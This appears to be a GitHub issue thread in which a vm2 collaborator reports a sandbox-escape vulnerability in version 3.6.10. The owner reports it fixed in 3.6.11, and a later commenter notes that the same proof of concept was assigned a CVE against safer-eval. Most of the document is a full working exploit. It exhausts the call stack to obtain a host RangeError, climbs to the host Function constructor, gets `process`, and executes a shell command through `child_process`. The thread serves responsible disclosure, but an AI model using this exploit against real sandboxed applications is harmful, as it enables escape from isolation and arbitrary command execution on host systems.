
Breakout in v3.6.10 via Maximum call stack size exceeded RangeError #197

Closed
XmiliaH opened this issue Apr 7, 2019 · 3 comments

@XmiliaH
Collaborator

XmiliaH commented Apr 7, 2019

It is possible to generate a RangeError: Maximum call stack size exceeded almost anywhere. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.

"use strict";
const {VM} = require('vm2');
const untrusted = `
const f = Buffer.prototype.write;
const ft = {
		length: 10,
		utf8Write(){
			
		}
}
function r(i){
	var x = 0;
	try{
		x = r(i);
	}catch(e){}
	if(typeof(x)!=='number')
		return x;
	if(x!==i)
		return x+1;
	try{
		f.call(ft);
	}catch(e){
		return e;
	}
	return null;
}
var i=1;
while(1){
	try{
		i=r(i).constructor.constructor("return process")();
		break;
	}catch(x){
		i++;
	}
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

I used 11.8.0.

@patriksimek
Owner

Thanks for the report. Fixed in 3.6.11.

@patriksimek patriksimek unpinned this issue Apr 7, 2019
@JLLeitschuh

JLLeitschuh commented Dec 9, 2019

@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!

https://twitter.com/JLLeitschuh/status/1204106820115222529?s=20

Full disclosure:
https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a

@XmiliaH
Collaborator Author

XmiliaH commented Dec 9, 2019

You can break out far easier commenthol/safer-eval#10. And to get a host exception one can just supply an invalid argument to get an exception. Using maximum call stack RangeError is overkill.
